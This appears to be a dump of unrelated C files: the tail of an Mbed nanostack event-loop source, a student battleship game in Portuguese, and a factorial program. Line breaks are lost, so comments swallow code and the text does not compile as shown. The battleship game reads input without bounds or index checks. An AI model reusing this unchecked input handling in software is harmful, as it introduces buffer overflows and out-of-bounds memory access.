osEventFlagsNew(&event_flags_attr); MBED_ASSERT(event_flag_id != NULL); #endif } #if !MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_DISPATCH_FROM_APPLICATION void ns_event_loop_thread_create(void) { event_thread_id = osThreadNew(event_loop_thread, NULL, &event_thread_attr); MBED_ASSERT(event_thread_id != NULL); } void ns_event_loop_thread_start(void) { } #endif #endif // !MBED_CONF_NANOSTACK_HAL_EVENT_LOOP_USE_MBED_EVENTS #endif //MBED_CONF_RTOS_PRESENT
the_stack_data/73574623.c
/************************************** * Trabalho 3 de Programacao de Computadores I - Batalha Naval * Curso de Sistemas da informacao * Aluno: Karolyne Pontes Marchon Portilho - matricula: 0050013539 * Professor: Alex Salgado ***************************************/ #include <stdio.h> int main () { int batalha[5][5] = {{0,0,1,1,0}, {1,0,1,0,0}, {0,1,1,0,0}, {1,0,0,1,1}, {0,1,0,1,0}}; int i, j; char jogador[30]; int continuar = 1; int pontos = 0; printf ( "Informe seu nome:" ); scanf ( " %s", jogador ); while ( continuar == 1 ) { printf ("Digite a coordenada de linha:(0 a 4)"); scanf ("%d",&i); printf ("Digite a coordenada de coluna:(0 a 4)"); scanf ("%d",&j); if ( batalha[i][j] == 1 ) { printf("\nBomba!! Você ganhou um ponto\n"); pontos++; } else if ( batalha[i][j] == 0 ) { printf("\nÁgua!! Você não fez pontos :( \n"); } printf( "\n Olá %s, você fez %d pontos!\n", jogador, pontos ); printf( "Deseja continuar? (Sim = 1, Não = 0)\n"); scanf ( "%d", &continuar); } return 0; }
the_stack_data/122015429.c
// PROGRAM-NAME : factorial // By sruthi s // PROGRAM-CODE :#include<stdio.h> int main() { int i,fact=1,number; printf("Enter a number: "); scanf("%d",&number); for(i=1;i<=number;i++){ fact=fact*i; } printf("Factorial of %d is: %d",number,fact); return 0; }